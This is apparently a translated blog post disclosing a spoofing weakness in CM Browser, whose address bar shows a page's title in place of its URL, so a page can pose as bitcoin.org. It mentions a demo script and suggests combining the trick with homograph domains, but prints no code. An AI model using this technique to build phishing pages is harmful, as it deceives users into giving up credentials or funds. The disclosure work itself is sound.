Phishing with the title tag

    Mobile browser developers have long been trying to erase the differences between sites and applications (yes, I look at you, PWA ), and they are quite good at it. But still, there remains another concept that makes the web a web and does not allow you to implement the user experience that is as close to the native application as possible - this is the URL in the address bar of the browser. I propose to find out how, say, the Chinese CM Browser copes with this problem .
    CM Browser


    Open Habr, and see that by default the title of the page is displayed in the address bar.



    And to see the URL, you need to tap on the address bar.



    In principle, it is clear how it all works. Now the question is real bitcoin.org or not? Even a green HTTPS lock available.


    bitcoin.org


    In fact, this site displayed a small script written by me (change the url parameter, oddly enough, in the URL and check the work on other sites). The source code of the script can be found on GitHub .



    Thus, we get a fairly simple to implement and effective (especially in combination with homographic domain ) opportunity for phishing at least 50 million users. I hope Cheetah Mobile and parent Kingsoft will pay attention to this problem as soon as possible.


    Also popular now: